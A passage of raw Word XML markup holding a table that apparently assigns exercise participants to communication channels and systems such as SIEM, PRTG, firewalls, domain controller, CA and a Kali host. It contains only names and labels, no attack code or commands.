                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>WT &amp; BT communications, rocket.chat, MISP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BA432B0" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>PRTG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w14:paraId="5A2851F2" w14:textId="77777777" w:rsidTr="007B1F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="6FED3D91" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Chip Guard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="7B5FC96D" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>WT &amp; BT communications, rocket.chat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="24BF4E37" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>FPCAP, SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w14:paraId="310C7FE1" w14:textId="77777777" w:rsidTr="007B1F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57DC9312" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Pertti Keinonen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4402F16E" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>cutbin, 8chan, news</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FF4E546" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>DC; files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w14:paraId="732518B3" w14:textId="77777777" w:rsidTr="007B1F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="47929F39" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Eetu Virtanen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="5EF3284B" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Cyberfence helpdesk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="315DB63D" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>ntp; DC; files; CA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w14:paraId="48CEDA1D" w14:textId="77777777" w:rsidTr="007B1F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7131835C" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Timo Silakka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="138955D6" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16AEBE7F" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>SIEM, Firewalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w14:paraId="7299A488" w14:textId="77777777" w:rsidTr="007B1F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="42926B6B" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Victor Harbor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="062FBC65" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>PRTG, Cyberfence helpdesk substitute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="705B1DF8" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>PRTG, Staff-WS; Intra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w14:paraId="118C925A" w14:textId="77777777" w:rsidTr="007B1F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B49F5E9" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Riku Rantala</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F6BB2E7" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Helpdesk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51BB17CA" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>ntp; CA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w14:paraId="0B1FEB0E" w14:textId="77777777" w:rsidTr="007B1F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="58D744BC" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Colt Luger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="5574C96C" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>cutbin, 8chan, news</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
          </w:tcPr>
          <w:p w14:paraId="7C600800" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Kali; WWW; Mail; Helpdesk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w14:paraId="0B7A1561" w14:textId="77777777" w:rsidTr="007B1F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2303" w:type="dxa"/>
